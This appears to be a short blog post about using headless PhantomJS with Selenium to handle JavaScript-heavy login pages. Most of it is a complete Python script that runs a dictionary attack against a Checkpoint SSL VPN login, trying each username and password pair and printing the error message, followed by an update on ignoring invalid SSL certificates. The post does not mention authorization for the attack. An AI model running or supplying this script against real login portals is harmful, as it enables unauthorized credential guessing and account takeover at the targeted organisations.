But sometimes, you run across a web app that does some ungodly Javascript hashing/mangling/demonic incantations to your input. When you see these situations, you need to have a tool parse, understand, and even execute the Javascript from your page.
I have found PhantomJS to be a fantastic tool to help with that. I use it as my "browser" for Selenium scripts and it works the same way, but this is all headless, no need for Firefox or Chrome windows to pop up and start clicking things. It all happens in the background transparently.
I recently came across a Checkpoint SSL VPN that I wanted to try a dictionary attack against. I wrote the following temporary script to accomplish it. It's not speedy, but then again that introduces a pseudo-sleep timer I was going to put in anyway.
I pasted the login combinations in the logins dict and ran it.
#!/usr/bin/env python3 from selenium import webdriver from selenium.webdriver.common.keys import Keys logins = {'user1':'pass1', 'user2':'pass2'} for username, password in logins.items(): driver = webdriver.PhantomJS() driver.set_window_size(1024, 768) driver.get('https://CHECKPOINTSSLVPN/sslvpn/Login/Login') usernamefield = driver.find_element_by_name('userName') usernamefield.send_keys(username) passwordfield = driver.find_element_by_name('loginInput') passwordfield.send_keys(password) passwordfield.send_keys(Keys.RETURN) errormsg = driver.find_element_by_id('ErrorMsg').text print(username + ':' + password + ' = ' + errormsg) driver.close()
UPDATE:
It turns out that phantomjs will return a completely empty page without any sort of error if it encounters an invalid SSL certificate. You can easily account for this by changing:
driver = webdriver.PhantomJS()
driver = webdriver.PhantomJS(service_args=['--ignore-ssl-errors=true'])
No comments:
Post a Comment